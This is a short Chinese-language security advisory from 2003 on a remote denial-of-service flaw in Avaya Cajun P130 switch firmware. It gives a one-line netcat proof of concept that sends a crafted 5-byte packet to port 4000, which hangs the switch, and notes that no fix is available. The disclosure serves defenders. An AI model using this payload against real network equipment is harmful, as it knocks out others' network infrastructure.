Avaya Cajun Network Switch连接延迟拒绝服务漏洞发布时间:2003-06-18 更新时间:2003-06-23 严重程度:中 威胁程度:远程拒绝服务 错误类型:意外情况处置错误 利用方式:服务器模式 BUGTRAQ ID:7961 受影响系统 Avaya Cajun P130 Series Firmware 2.9.1详细描述 通过连接Avaya交换机4000端口,并发送5个字节的包,前4个字节代表一个负整数的包,就可以使交换机停止响应,多此请求可导致交换机重新启动。 测试代码 sq5bpf@hash:~$ printf "\x80dupa"|nc -v -v -v -n 192.168.66.3 4000 (UNKNOWN) [192.168.66.3] 4000 (?) open [the connections stalls] 解决方案 尚无 相关信息 参考:http://www.securityfocus.com/archive/1/325582 http://support.avaya.com/japple/css/japple?temp.groupID=128450&temp.selectedFamily=153415&temp.selectedProduct=153418&temp.selectedBucket=126995&temp.feedbackState=askForFeedback&temp.documentID=153420&PAGE=avaya.css.CSSLvl1Detail&executeTransaction=avaya 相关主页:http://support.avaya.com/japple/css/japple?PAGE=avaya.css.CSSLvl1&ac.productFamily=-1&ac.productID=-1&temp.groupID=142804 |